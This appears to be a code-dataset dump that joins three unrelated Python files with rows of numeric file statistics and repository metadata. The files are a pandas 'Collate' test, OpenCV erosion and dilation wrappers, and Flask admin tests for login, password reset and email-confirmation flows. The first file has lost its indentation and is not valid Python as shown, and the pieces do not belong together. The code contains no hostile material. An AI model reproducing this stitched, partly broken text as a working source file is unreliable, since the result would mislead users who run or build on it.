import pandas as pd
from pipedown.nodes.filters.collate import Collate
from pipedown.utils.empty import EMPTY
def test_collate():
df = pd.DataFrame()
df["a"] = [1, 2, 3, 4]
df["b"] = ["a", "b", "c", "d"]
df["c"] = [5.0, 6.0, 7.0, 8.0]
collate = Collate()
xo, yo = collate.run(
(df[["a", "b"]].iloc[[1, 3]], df["c"].iloc[[1, 3]]),
(df[["a", "b"]].iloc[[0, 2]], df["c"].iloc[[0, 2]]),
)
assert isinstance(xo, pd.DataFrame)
assert xo.shape[0] == 4
assert xo.shape[1] == 2
assert xo.iloc[0, 0] == 1
assert xo.iloc[1, 0] == 2
assert xo.iloc[2, 0] == 3
assert xo.iloc[3, 0] == 4
assert xo.iloc[0, 1] == "a"
assert xo.iloc[1, 1] == "b"
assert xo.iloc[2, 1] == "c"
assert xo.iloc[3, 1] == "d"
assert isinstance(yo, pd.Series)
assert yo.shape[0] == 4
assert yo.iloc[0] == 5.0
assert yo.iloc[1] == 6.0
assert yo.iloc[2] == 7.0
assert yo.iloc[3] == 8.0
def test_collate_with_empty():
df = pd.DataFrame()
df["a"] = [1, 2, 3, 4]
df["b"] = ["a", "b", "c", "d"]
df["c"] = [5.0, 6.0, 7.0, 8.0]
collate = Collate()
xo, yo = collate.run(
EMPTY,
(df[["a", "b"]].iloc[[1, 3]], df["c"].iloc[[1, 3]]),
EMPTY,
(df[["a", "b"]].iloc[[0, 2]], df["c"].iloc[[0, 2]]),
EMPTY,
)
assert isinstance(xo, pd.DataFrame)
assert xo.shape[0] == 4
assert xo.shape[1] == 2
assert xo.iloc[0, 0] == 1
assert xo.iloc[1, 0] == 2
assert xo.iloc[2, 0] == 3
assert xo.iloc[3, 0] == 4
assert xo.iloc[0, 1] == "a"
assert xo.iloc[1, 1] == "b"
assert xo.iloc[2, 1] == "c"
assert xo.iloc[3, 1] == "d"
assert isinstance(yo, pd.Series)
assert yo.shape[0] == 4
assert yo.iloc[0] == 5.0
assert yo.iloc[1] == 6.0
assert yo.iloc[2] == 7.0
assert yo.iloc[3] == 8.0
def test_collate_with_y_none():
df = pd.DataFrame()
df["a"] = [1, 2, 3, 4]
df["b"] = ["a", "b", "c", "d"]
df["c"] = [5.0, 6.0, 7.0, 8.0]
collate = Collate()
xo, yo = collate.run(
(df[["a", "b"]].iloc[[1, 3]], None),
(df[["a", "b"]].iloc[[0, 2]], None),
)
assert isinstance(xo, pd.DataFrame)
assert xo.shape[0] == 4
assert xo.shape[1] == 2
assert xo.iloc[0, 0] == 1
assert xo.iloc[1, 0] == 2
assert xo.iloc[2, 0] == 3
assert xo.iloc[3, 0] == 4
assert xo.iloc[0, 1] == "a"
assert xo.iloc[1, 1] == "b"
assert xo.iloc[2, 1] == "c"
assert xo.iloc[3, 1] == "d"
assert yo is None
| 25.606061
| 60
| 0.485602
| 446
| 2,535
| 2.742152
| 0.089686
| 0.196239
| 0.235487
| 0.039248
| 0.887163
| 0.878986
| 0.870809
| 0.870809
| 0.870809
| 0.870809
| 0
| 0.084783
| 0.274162
| 2,535
| 98
| 61
| 25.867347
| 0.579891
| 0
| 0
| 0.853659
| 0
| 0
| 0.019329
| 0
| 0
| 0
| 0
| 0
| 0.560976
| 1
| 0.036585
| false
| 0
| 0.036585
| 0
| 0.073171
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d894c4a1bdfa0f077ce256dd203cb0930613965c
| 3,505
|
py
|
Python
|
ovl/morphological_functions/morphological_functions.py
|
frc1937/ovl
|
1954edf0ab946dbb42d90eba1dac97eeb157c567
|
[
"Apache-2.0"
] | 1
|
2021-05-13T12:15:29.000Z
|
2021-05-13T12:15:29.000Z
|
ovl/morphological_functions/morphological_functions.py
|
frc1937/ovl
|
1954edf0ab946dbb42d90eba1dac97eeb157c567
|
[
"Apache-2.0"
] | null | null | null |
ovl/morphological_functions/morphological_functions.py
|
frc1937/ovl
|
1954edf0ab946dbb42d90eba1dac97eeb157c567
|
[
"Apache-2.0"
] | null | null | null |
import cv2
from ..image_filters import kernels
from ..image_filters.image_filter import image_filter
from ..utils.remove_none_values import remove_none_values
@image_filter
def erosion(mask, kernel=None, iterations=1, destination=None,
anchor=None, border_type=None, border_value=None):
"""
a copy of cv2.erode with default kernel of 5 by 5
(a logical operation on the binary mask,
whether every pixel's value should stay as it is based on neighboring pixels,
which neighbors are chosen by the kernel and its dimensions)
Erode demands all chosen neighbors must be True (white)
For more information:
https://docs.opencv.org/3.0-beta/doc/py_tutorials/py_imgproc/py_morphological_ops/py_morphological_ops.html
:param mask: the binary image where the erosion morphological function should be applied
:param kernel: the kernel that should be used
:param iterations: Number of times the function should be applied
:param destination: where the new image should be saved
:param anchor: position of the anchor within the element
:param border_value: border value in case of a constant border
:param border_type: Pixel extrapolation technique for the border of the image
see: https://docs.opencv.org/3.4.2/d2/de8/group__core__array.html#ga209f2f4869e304c82d07739337eae7c5
:return: the eroded binary mask
"""
if isinstance(kernel, tuple):
kernel = kernels.rectangle_kernel(kernel)
arguments = {
"iterations": iterations,
"dst": destination,
"anchor": anchor,
"borderType": border_type,
"borderValue": border_value
}
return cv2.erode(mask,
kernel,
**remove_none_values(arguments))
@image_filter
def dilation(mask, kernel=(5, 5), iterations=1, destination=None,
anchor=None, border_type=None, border_value=None):
"""
a copy of cv2.dilate with default kernel of 5 by 5
(a logical operation on the binary mask,
whether every pixel's value should stay as it is based on neighboring pixels,
which neighbors are chosen by the kernel and its dimensions)
Dilation demands at least one chosen neighbors must be True (white)
For more information:
https://docs.opencv.org/3.0-beta/doc/py_tutorials/py_imgproc/py_morphological_ops/py_morphological_ops.html
:param mask: the binary image where the erosion morphological function should be applied
:param kernel: the kernel that should be used
:param iterations: Number of times the function should be applied
:param destination: where the new image should be saved
:param anchor: position of the anchor within the element
:param border_value: border value in case of a constant border
:param border_type: sets the technique the pixels, that exceed the boundaries of the image for the use
of the kernel, are determined with (if they should mirror, copy)
See: https://docs.opencv.org/3.4.2/d2/de8/group__core__array.html#ga209f2f4869e304c82d07739337eae7c5
:return: the dilated binary mask
"""
if isinstance(kernel, tuple):
kernel = kernels.rectangle_kernel(kernel)
arguments = {
"iterations": iterations,
"dst": destination,
"anchor": anchor,
"borderType": border_type,
"borderValue": border_value
}
return cv2.dilate(mask,
kernel,
**remove_none_values(arguments))
| 44.367089
| 111
| 0.707275
| 476
| 3,505
| 5.107143
| 0.266807
| 0.036199
| 0.026327
| 0.029617
| 0.819416
| 0.819416
| 0.790621
| 0.790621
| 0.790621
| 0.790621
| 0
| 0.026809
| 0.22311
| 3,505
| 78
| 112
| 44.935897
| 0.865957
| 0.608845
| 0
| 0.705882
| 0
| 0
| 0.065844
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.117647
| 0
| 0.235294
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
99667c1295a6032e7bfb9ac288167df68846d31f
| 197,927
|
py
|
Python
|
opac/tests/test_admin_views.py
|
jamilatta/opac
|
380da89a5ceb84f843a65c36455404fcb8dc1173
|
[
"BSD-2-Clause"
] | null | null | null |
opac/tests/test_admin_views.py
|
jamilatta/opac
|
380da89a5ceb84f843a65c36455404fcb8dc1173
|
[
"BSD-2-Clause"
] | null | null | null |
opac/tests/test_admin_views.py
|
jamilatta/opac
|
380da89a5ceb84f843a65c36455404fcb8dc1173
|
[
"BSD-2-Clause"
] | null | null | null |
# coding: utf-8
import unittest
import re
from flask import current_app, url_for, g
from flask_login import current_user
from webapp import dbsql, mail
from webapp.utils import create_user
from webapp.admin import forms
from webapp.controllers import get_user_by_email
from webapp.notifications import send_confirmation_email
from .base import BaseTestCase
from tests.utils import (
makeOneJournal,
makeOneIssue,
makeOneArticle,
makeOneCollection, makeOneSponsor
)
reset_pwd_url_pattern = re.compile('href="(.*)">')
email_confirm_url_pattern = re.compile('href="(.*)">')
class AdminViewsTestCase(BaseTestCase):
def test_unauthorized_access_to_admin_index_must_redirect(self):
"""
Quando:
acessamos a pagina o admin/index, sem ter feito login.
Verificamos:
que é feito um redirect para admin/login
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
admin_index_url = url_for('admin.index')
expected_login_url = url_for('admin.login_view')
# when
response = c.get(admin_index_url, follow_redirects=False)
# then
self.assertStatus(response, 302)
self.assertEqual('text/html; charset=utf-8', response.content_type)
self.assertRedirects(response, expected_login_url)
def test_access_to_admin_index_must_redirect_to_login_form(self):
"""
Quando:
acessamos a pagina o admin/index, sem ter feito login.
Verificamos:
que é feito um redirect para admin/login
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
admin_index_url = url_for('admin.index')
# when
response = c.get(admin_index_url, follow_redirects=True)
# then
self.assertStatus(response, 200)
self.assertEqual('text/html; charset=utf-8', response.content_type)
self.assertTemplateUsed('admin/auth/login.html')
def test_invalid_credentials_login_must_show_validation_error(self):
"""
Com:
dados válido para fazer login, de um usuário que *NÃO* existe.
Quando:
tentamos fazer login com esses dados.
Verificamos:
- a pagina visualizada corresponde ao login.
- a pagina visualizada contem uma mensagem indicando: usuário inválido.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
login_url = url_for('admin.login_view')
login_credentials = {
'email': 'foo@example.com',
'password': '123'
}
expected_errors_msg = {
'password': u'<span class="help-block">Usuário inválido</span>',
}
# when
response = c.post(login_url, data=login_credentials)
# then
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/login.html')
self.assertIn(expected_errors_msg['password'], response.data.decode('utf-8'))
def test_invalid_user_login_must_show_validation_error(self):
"""
Com:
dados para fazer login: email inválida, senha válida.
Quando:
tentamos fazer login com esses dados.
Verificamos:
- a pagina visualizada corresponde ao login.
- a pagina visualizada contem uma mensagem indicando:
email inválido e usuário inválido.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
login_url = url_for('admin.login_view')
login_credentials = {
'email': 'foo', # email inválido
'password': '123'
}
expected_errors_msg = {
'email': u'<span class="help-block">Invalid email address.</span>',
'password': u'<span class="help-block">Usuário inválido</span>',
}
# when
response = c.post(login_url, data=login_credentials)
# then
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/login.html')
self.assertIn(expected_errors_msg['email'], response.data.decode('utf-8'))
self.assertIn(expected_errors_msg['password'], response.data.decode('utf-8'))
def test_invalid_password_login_must_show_validation_error(self):
"""
Com:
dados para fazer login: email válido, senha inválida.
Quando:
tentamos fazer login com esses dados.
Verificamos:
- a pagina visualizada corresponde ao login.
- a pagina visualizada contem uma mensagem indicando senha requerida.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
login_url = url_for('admin.login_view')
login_credentials = {
'email': 'foo@example.com',
'password': '', # senha inválida
}
expected_errors_msg = {
'password': u'<span class="help-block">This field is required.</span>',
}
# when
response = c.post(login_url, data=login_credentials)
# then
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/login.html')
self.assertIn(expected_errors_msg['password'], response.data.decode('utf-8'))
def test_login_successfully(self):
"""
Com:
um novo usuário (com email confirmado)
Quando:
o novo usuário faz login
Verificamos:
- a página visualizada corresponde ao admin/index
- a página visualizada contem link para fazer logout.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
login_url = url_for('admin.login_view')
credentials = {
'email': 'foo@example.com',
'password': '123',
}
expected_page_header = u'<h1>OPAC Admin <small>da coleção: %s</small></h1>' % \
current_app.config['OPAC_COLLECTION'].upper()
expected_logout_url = url_for('admin.logout_view')
# when
create_user(
credentials['email'],
credentials['password'],
True)
# create new user:
response = c.post(login_url, data=credentials, follow_redirects=True)
# then
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertIn(expected_page_header, response.data.decode('utf-8'))
self.assertIn(expected_logout_url, response.data.decode('utf-8'))
def test_login_valid_user_with_invalid_password_raise_error_msg(self):
"""
Com:
um novo usuário (com email confirmado)
Quando:
o novo usuário faz login, mas com a senha errada
Verificamos:
- a página visualizada corresponde ao admin/index
- a página visualizada deve informar de senha inválida
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
login_url = url_for('admin.login_view')
credentials = {
'email': 'foo@example.com',
'password': '123',
}
logged_page_header = u'<h1>OPAC Admin <small>da coleção: %s</small></h1>' % \
current_app.config['OPAC_COLLECTION'].upper()
logout_url = url_for('admin.logout_view')
# when
create_user(
credentials['email'],
credentials['password'],
True)
# create new user:
response = c.post(
login_url,
data={
'email': credentials['email'],
'password': 'foo.bar',
},
follow_redirects=True)
# then
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/login.html')
self.assertNotIn(logged_page_header, response.data.decode('utf-8'))
self.assertNotIn(logout_url, response.data.decode('utf-8'))
def test_login_page_must_have_link_to_password_reset(self):
"""
Quando:
acessamos a pagina de login
Verificamos:
na pagina aparece os link para: recuperar a senha
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
login_url = url_for('admin.login_view')
expected_reset_pwd_link = url_for('admin.reset')
# when
response = c.get(login_url, follow_redirects=True)
# then
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/login.html')
self.assertIn(expected_reset_pwd_link, response.data.decode('utf-8'))
def test_login_page_must_have_set_language_links(self):
"""
Com:
a lista de idiomas suportados pela app
Quando:
acesso a pagina de login
Verificamos:
na pagina aparecem os links para trocar de idioma
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
login_url = url_for('admin.login_view')
languages = current_app.config['LANGUAGES']
lang_urls = {}
for lang_code, lang_name in languages.items():
lang_urls[lang_code] = {
'url': url_for('main.set_locale', lang_code=lang_code),
'name': lang_name,
}
# when
response = c.get(login_url, follow_redirects=True)
# then
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/login.html')
for lang_code, lang_data in lang_urls.items():
lang_url = lang_data['url']
lang_name = lang_data['name']
self.assertIn(lang_url, response.data.decode('utf-8'))
self.assertIn(lang_name, response.data.decode('utf-8'))
@unittest.skip("Falhou na chamada: get_context_variable depois de adicionar os withs")
def test_login_with_unconfirmed_user_must_not_proceed(self):
"""
Com:
um novo usuário (com email NÃO confirmado)
Quando:
o novo usuário faz login, com os dados certos
Verificamos:
- a página visualizada corresponde a admin/auth/unconfirm_email.html.
- a página visualizada deve informar do erro.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
login_url = url_for('admin.login_view')
credentials = {
'email': 'foo@example.com',
'password': '123',
}
expected_form_error = {'password': [u'Senha inválida']}
expected_error_msgs = [
u"Email não confirmado!",
u"Você <strong>deve</strong> confirmar seu email.<br>",
u"<strong>Por favor entre em contato com o administrador.</strong>"]
create_user(
credentials['email'],
credentials['password'],
False)
# when
# create new user:
response = c.post(
login_url,
data=credentials,
follow_redirects=True)
# then
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/unconfirm_email.html')
for msg in expected_error_msgs:
self.assertIn(msg, response.data.decode('utf-8'))
context_form = self.get_context_variable('form')
self.assertIsInstance(context_form, forms.LoginForm)
self.assertEqual(expected_form_error, context_form.errors)
def test_logout_successfully(self):
"""
Com:
um novo usuário (com email confirmado).
Quando:
usuario faz login, e depois logout
Verificamos:
a operação (logout) é realizada com sucesso
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
login_url = url_for('admin.login_view')
logout_url = url_for('admin.logout_view')
credentials = {
'email': 'foo@example.com',
'password': '123',
}
# when
create_user(credentials['email'], credentials['password'], True)
login_response = c.post(login_url, data=credentials, follow_redirects=True)
self.assertStatus(login_response, 200)
logout_response = c.get(logout_url, follow_redirects=True)
# then
self.assertStatus(logout_response, 200)
self.assertTemplateUsed('admin/auth/login.html')
def test_reset_password_has_form_as_expected(self):
"""
Com:
um novo usuário (com email confirmado).
Quando:
solicitamos a recuperação de senha.
Verificamos:
a pagina carregada é a esperad com o formulario esperado
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
reset_pwd_url = url_for('admin.reset')
# when
response = c.get(reset_pwd_url)
# then
self.assertStatus(response, 200)
self.assertEqual('text/html; charset=utf-8', response.content_type)
self.assertTemplateUsed('admin/auth/reset.html')
context_form = self.get_context_variable('form')
self.assertIsInstance(context_form, forms.EmailForm)
def test_reset_password_of_invalid_user_raise_404(self):
"""
Com:
um novo usuário (com email confirmado).
Quando:
solicitamos a recuperação de senha.
Verificamos:
deve mostrar uma pagina 404 com o aviso
de usuário não encontrado.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
reset_pwd_url = url_for('admin.reset')
user_email = 'foo@example.com'
expected_errors_msg = u'<p>Usuário não encontrado</p>'
# when
response = c.post(reset_pwd_url, data={'email': user_email})
# then
self.assertStatus(response, 404)
self.assertEqual('text/html; charset=utf-8', response.content_type)
self.assertTemplateUsed('errors/404.html')
error_msg = self.get_context_variable('message')
self.assertEqual(error_msg, expected_errors_msg)
def test_reset_password_of_valid_user_proceed_ok(self):
"""
Com:
um novo usuário (com email confirmado).
Quando:
solicitamos a recuperação de senha.
Verificamos:
A notifiação (flash) na página de que foram enviadas
as instruções para o email do novo usuário.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
credentials = {
'email': 'foo@bar.com',
'password': '123'
}
# with
reset_pwd_url = url_for('admin.reset')
expected_msg = u'Enviamos as instruções para recuperar a senha para: %s' % \
credentials['email']
# when
create_user(credentials['email'], credentials['password'], True)
response = c.post(
reset_pwd_url,
data={'email': credentials['email']},
follow_redirects=True)
# then
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/login.html')
self.assertIn(expected_msg, response.data.decode('utf-8'))
def test_reset_password_of_valid_user_email_sent(self):
"""
Com:
um novo usuário (com email confirmado)
Quando:
solicitar a recuperação de senha
Verificamos:
Que a mensagem no email enviado contém o
link para continuar a operação.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
reset_pwd_url = url_for('admin.reset')
credentials = {
'email': 'foo@bar.com',
'password': '123'
}
expected_email = {
'subject': u'Instruções para recuperar sua senha',
'recipients': [credentials['email'], ],
'body_has_link': u'<a href="http://localhost%s' % reset_pwd_url
}
# when
create_user(credentials['email'], credentials['password'], True)
with mail.record_messages() as outbox:
response = c.post(
reset_pwd_url,
data={'email': credentials['email']},
follow_redirects=True)
# then
self.assertStatus(response, 200)
self.assertEqual(1, len(outbox))
email_msg = outbox[0]
self.assertEqual(expected_email['subject'], email_msg.subject)
self.assertEqual(expected_email['recipients'], email_msg.recipients)
self.assertIn(expected_email['body_has_link'], email_msg.html)
def test_reset_password_send_valid_link_via_email(self):
"""
Com:
um novo usuário (com email confirmado),
Quando:
solicitamos recuperar senha, e obtemos o email com
a url necessária para concluir a operação.
Verificamos:
- o email enviado contém um link para recupear senha.
- a pagina de recuparar senha com token seja a correta.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
reset_pwd_url = url_for('admin.reset')
credentials = {
'email': 'foo@bar.com',
'password': '123'
}
# when
create_user(credentials['email'], credentials['password'], True)
with mail.record_messages() as outbox:
c.post(
reset_pwd_url,
data={'email': credentials['email']},
follow_redirects=True)
# then
self.assertEqual(1, len(outbox))
email_msg = outbox[0]
# recupero os links do email
links_found = reset_pwd_url_pattern.findall(email_msg.html)
# tem pelo menos 1 link, e tem só um link para o reset/password com token
self.assertGreaterEqual(1, len(links_found))
resert_url_with_token = [url for url in links_found if reset_pwd_url in url]
self.assertEqual(1, len(resert_url_with_token))
resert_url_with_token = resert_url_with_token[0]
# requisição de reset passoword com token
reset_pwd_response = c.get(
resert_url_with_token,
follow_redirects=True)
self.assertStatus(reset_pwd_response, 200)
self.assertTemplateUsed('admin/auth/reset_with_token.html')
context_form = self.get_context_variable('form')
self.assertIsInstance(context_form, forms.PasswordForm)
def test_link_sent_via_email_to_reset_password_works_fine(self):
"""
Com:
um novo usuário (com email confirmado),
Quando:
1. solicitamos recuperar senha.
2. obtemos o email com a url necessária para recuperação.
3. e solicitamos uma nova senha, com o link do email.
4. inserimos uma nova senha para o úsuario.
Verificamos:
- a pagina de recuperar senha tenha o form esperado.
- a senha do usuário deve ser atualizada.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
reset_pwd_url = url_for('admin.reset')
credentials = {
'email': 'foo@bar.com',
'password': '123'
}
# when
create_user(credentials['email'], credentials['password'], True)
with mail.record_messages() as outbox:
response = c.post(
reset_pwd_url,
data={'email': credentials['email']},
follow_redirects=True)
# then
self.assertEqual(1, len(outbox))
email_msg = outbox[0]
# recupero os links do email
links_found = reset_pwd_url_pattern.findall(email_msg.html)
# tem pelo menos 1 link, e tem só um link para o reset/password com token
self.assertGreaterEqual(1, len(links_found))
resert_url_with_token = [url for url in links_found if reset_pwd_url in url][0]
new_password = 'blaus'
response = c.post(
resert_url_with_token,
data={'password': new_password},
follow_redirects=True)
self.assertStatus(response, 200)
# verificação da nova senha do usuario
user = get_user_by_email(credentials['email'])
self.assertTrue(user.is_correct_password(new_password))
def test_reset_password_with_invalid_password_raise_validation_error(self):
"""
Com:
um novo usuário (com email confirmado),
Quando:
1. solicitamos recuperar senha.
2. obtemos o email com a url necessária para recuperação.
3. e solicitamos uma nova senha, com o link do email.
4. inserimos uma senha inválida ('')
Verificamos:
- a pagina deve informar de que senha é requerida
- a senha do usuário não deve ser modificada
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
reset_pwd_url = url_for('admin.reset')
credentials = {
'email': 'foo@bar.com',
'password': '123'
}
# when
create_user(credentials['email'], credentials['password'], True)
with mail.record_messages() as outbox:
response = c.post(
reset_pwd_url,
data={'email': credentials['email']},
follow_redirects=True)
# then
self.assertEqual(1, len(outbox))
email_msg = outbox[0]
# recupero os links do email
links_found = reset_pwd_url_pattern.findall(email_msg.html)
# tem pelo menos 1 link, e tem só um link para o reset/password com token
self.assertGreaterEqual(1, len(links_found))
resert_url_with_token = [url for url in links_found if reset_pwd_url in url][0]
invalid_password = ''
response = c.post(
resert_url_with_token,
data={'password': invalid_password},
follow_redirects=True)
self.assertStatus(response, 200)
context_form = self.get_context_variable('form')
expected_form_error = {'password': [u'This field is required.']}
self.assertEqual(expected_form_error, context_form.errors)
self.assertIn(expected_form_error['password'][0], response.data.decode('utf-8'))
user = get_user_by_email(credentials['email'])
self.assertFalse(user.is_correct_password(invalid_password))
def test_reset_password_with_unconfirmed_email_shows_unconfirm_email_error(self):
"""
Com:
um novo usuário (com email NÃO confirmado),
Quando:
1. solicitamos recuperar senha.
2. obtemos o email com a url necessária para recuperação.
3. e solicitamos uma nova senha, com o link (token) do email.
Verificamos:
- a pagina deve informar que é necessário confirmar o email.
- a troca de senha não procede.
- a pagina deve mostrar o template admin/auth/unconfirm_email.html
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
reset_pwd_url = url_for('admin.reset')
credentials = {
'email': 'foo@bar.com',
'password': '123'
}
# when
create_user(credentials['email'], credentials['password'], False)
with mail.record_messages() as outbox:
response = c.post(
reset_pwd_url,
data={'email': credentials['email']},
follow_redirects=True)
# then
# no foi enviado nenhum email
self.assertEqual(0, len(outbox))
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/unconfirm_email.html')
user = get_user_by_email(credentials['email'])
self.assertTrue(user.is_correct_password(credentials['password']))
def test_reset_password_with_unconfirmed_email_raise_validation_error_2(self):
"""
Com:
um novo usuário (com email confirmado),
Quando:
1. solicitamos recuperar senha.
2. obtemos o email com a url necessária para recuperação.
3. mudamos o usuário para ter seu email como NÃO confirmado.
4. e solicitamos uma nova senha, com o link (token) do email.
Verificamos:
- a pagina deve informar que é necessário confirmar o email.
- a troca de senha não procede.
- a pagina deve mostrar o template admin/auth/unconfirm_email.html
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
reset_pwd_url = url_for('admin.reset')
credentials = {
'email': 'foo@bar.com',
'password': '123'
}
# when
create_user(credentials['email'], credentials['password'], True)
with mail.record_messages() as outbox:
response = c.post(
reset_pwd_url,
data={'email': credentials['email']},
follow_redirects=True)
# then
self.assertEqual(1, len(outbox))
email_msg = outbox[0]
# recupero os links do email
links_found = reset_pwd_url_pattern.findall(email_msg.html)
# tem pelo menos 1 link, e tem só um link para o reset/password com token
self.assertGreaterEqual(1, len(links_found))
resert_url_with_token = [url for url in links_found if reset_pwd_url in url][0]
# agora o usuário tem o email NÃO confirmado.
user = get_user_by_email(credentials['email'])
user.email_confirmed = False
dbsql.session.add(user)
dbsql.session.commit()
# tentamos recuperar a senha com o link/token do email
new_password = '321'
response = c.post(
resert_url_with_token,
data={'password': new_password},
follow_redirects=True)
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/unconfirm_email.html')
user = get_user_by_email(credentials['email'])
self.assertTrue(user.is_correct_password(credentials['password']))
def test_reset_password_with_invalid_token_raise_404_error_page(self):
"""
Com:
- token inválido
Quando:
solicitar a recuperação de senha com token inválido
Verificamos:
mostra uma pagina de erro 404 com a mensagem de erro
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
invalid_token = 'foo.123.faketoken'
reset_with_token_url = url_for('admin.reset_with_token', token=invalid_token)
expected_errors_msg = u'<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>'
# when
response = c.get(reset_with_token_url, follow_redirects=True)
# then
self.assertStatus(response, 404)
self.assertTemplateUsed('errors/404.html')
error_message = self.get_context_variable('message')
self.assertEqual(expected_errors_msg, error_message)
def test_confirm_email_with_invalid_token_raise_404_message(self):
"""
Com:
- token inválido
Quando:
solicitar a confirmação de email com token inválido
Verificamos:
mostra uma pagina de erro 404 com a mensagem de erro
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
invalid_token = 'foo.123.faketoken'
confirm_email_url = url_for('admin.confirm_email', token=invalid_token)
expected_errors_msg = u'<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>'
# when
response = c.get(confirm_email_url, follow_redirects=True)
# then
self.assertStatus(response, 404)
self.assertTemplateUsed('errors/404.html')
error_message = self.get_context_variable('message')
self.assertEqual(expected_errors_msg, error_message)
def test_confirmation_email_send_email_with_token(self):
"""
Com:
- o usuário 'administrador' logado (email confirmado)
- um novo usuário, com email NÃO confirmado
Quando:
1. enviamos emails de confirmação (utilizando a ação do admin/user)
2.
Verificamos:
- que o email enviado contem um link para confirmar email.
- o email é enviado para o destinatario certo.
- após a operação, a página é a correta.
- as notifiação para usuário deve ser mostrada na página.
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
normal_user = {
'email': 'foo@bar.com',
'password': '123'
}
create_user(normal_user['email'], normal_user['password'], False)
login_url = url_for('admin.login_view')
action_payload = {
'action': 'confirm_email',
'rowid': get_user_by_email(normal_user['email']).id,
'url': '/admin/user/'
}
expected_email_sent_notifications = [
u"Enviamos o email de confirmação para: %s" % normal_user['email'],
u"1 usuários foram notificados com sucesso!",
]
expected_email = {
'subject': u'Confirmação de email',
'recipients': [normal_user['email'], ],
}
# when
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# login do usuario admin
login_response = c.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
# requisição da ação para enviar email de confirmação
with mail.record_messages() as outbox:
action_response = c.post(
'/admin/user/action/',
data=action_payload,
follow_redirects=True)
# then
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
for msg in expected_email_sent_notifications:
self.assertIn(msg, action_response.data.decode('utf-8'))
# temos um email
self.assertEqual(1, len(outbox))
email_msg = outbox[0]
# email enviado ao destinatario certo, com assunto certo
self.assertEqual(expected_email['recipients'], email_msg.recipients)
# print "expected_email['subject']: ", expected_email['subject']
# print "email_msg.subject.decode('utf-8')", email_msg.subject
self.assertEqual(expected_email['subject'], email_msg.subject)
# pegamos o link com token
links_found = email_confirm_url_pattern.findall(email_msg.html)
# tem pelo menos 1 link, e tem só um link para o reset/password com token
self.assertGreaterEqual(1, len(links_found))
email_confirmation_url_with_token = [url for url in links_found if '/admin/confirm/' in url]
# temos a url com o token
self.assertEqual(1, len(email_confirmation_url_with_token))
email_confirmation_url_with_token = email_confirmation_url_with_token[0]
